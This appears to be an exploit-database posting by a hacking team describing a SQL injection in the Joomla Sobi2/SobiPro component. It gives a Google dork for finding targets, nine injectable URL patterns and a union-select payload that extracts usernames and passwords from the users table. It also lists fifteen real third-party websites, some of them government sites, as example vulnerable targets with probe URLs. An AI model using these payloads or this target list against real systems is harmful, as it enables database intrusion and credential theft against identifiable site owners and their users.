facebook facebook twitter rss

Joomla Sobi2 SobiPro Components 1.4.9 SQL Injection

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : Joomla Sobi2 SobiPro Components 1.4.9 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 01/02/2019
# Vendor Homepage : sigsiu.net
# Software Download Link : sigsiu.net/center/sobipro-component
# Software Information Links : joomla4ever.org/extensions/ext-sobi2
extensions.joomla.org/extension/sobipro/
# Software Version : 1.4.9 and J3.x
# Affected All Versions : Joomla 1.5 - 1.0.8; Joomla 2.5, Joomla 3.x - 1.1.10
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_sobi2''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************

SobiPro - creating and building a business directory for CMS Joomla.

SobiPro is an advanced powerful multi-content directory component for Joomla!

that has been originally designed as a directory extension with CCK features.

With SobiPro you can easily create multiple directories or any type of content.

####################################################################

# Impact :
***********

Joomla Sobi2 SobiPro 1.4.9 and other versions component for Joomla! is

prone to an SQL-injection vulnerability because it fails to sufficiently

sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access

or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application

and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_sobi2&Itemid=[SQL Injection]

/index.php?option=com_sobi2&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_sobi2&letter=[LETTER-HERE]&Itemid=[SQL Injection]

/index.php?option=com_sobi2&sobi2Task=popularListing&Itemid=[SQL Injection]

/index.php?option=com_sobi2&sobi2Task=sobi2Details&catid=[SQL Injection]

/index.php?option=com_sobi2&catid=[ID-NUMBER]&limitstart=[SQL Injection]

/index.php?option=com_sobi2&sobi2Task=sobi2Details&catid=
[ID-NUMBER]&sobi2Id=[SQL Injection]

/index.php?option=com_sobi2&sobi2Task=sobi2Details&catid=
[ID-NUMBER]&sobi2Id=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_sobi2&Itemid=27&catid=[SQL Injection]

# Example Exploit Payload :
*************************

-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*

####################################################################

# Example Vulnerable Sites :
*************************

[+] ville-bon-encontre.fr/index.php?option=com_sobi2&sobi2Task=
sobi2Details&catid=6&sobi2Id=100&Itemid=44%27

[+] clubecampismolisboa.pt/j10ccl/index.php?option=com_sobi2&Itemid=235%27

[+] villagepaquetville.com/index.php?option=com_sobi2&letter=J&Itemid=83%27

[+] kirchen-wiesbaden.de/kiwicms/index.php?option=com_sobi2&sobi2Task=
sobi2Details&catid=2&sobi2Id=60&Itemid=1%27

[+] ortopediapanzironi.it/index.php?option=com_sobi2&sobi2Task=
sobi2Details&sobi2Id=106&Itemid=1%27

[+] guiaoriental.com/index.php?option=com_sobi2&catid=40&Itemid=60&limitstart=24%27

[+] crib44.fr/index.php?option=com_sobi2&sobi2Task=popularListing&Itemid=4%27

[+] mkmoda.org/index.php?option=com_sobi2&letter=Z&Itemid=65%27

[+] mapinfotools.com/index.php?option=com_sobi2&
sobi2Task=sobi2Details&catid=0&sobi2Id=308&Itemid=72%27

[+] dansksecurity.dk/index.php?option=com_sobi2&catid=35&Itemid=52%27

[+] desarrollo.treintaytres.gub.uy/index.php?option=com_sobi2&catid=102&Itemid=59%27

[+] ypkt.gov.my/direktoripjd/index.php?option=com_sobi2&catid=14&Itemid=3%27

[+] welcometoiceland.is/index.php?option=com_sobi2&catid=24&Itemid=35%27

[+] financer.co.il/index.php?option=com_sobi2&Itemid=90%27

[+] s291067893.onlinehome.fr/masortieloisir/siteprod/index.php?option=
com_sobi2&sobi2Task=sobi2Details&catid=26&sobi2Id=17&Itemid=1%27

####################################################################

# Example SQL Database Error :
****************************

Notice: Only variable references should be returned by reference
in /var/www/clients/client11/web20/web/libraries/joomla/session/session.php on line 343

Deprecated: Non-static method JApplicationHelper::getPath()
should not be called statically, assuming $this from incompatible context
in /home/otpda/public_html/libraries/joomla/application/component/helper.php on line 168

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :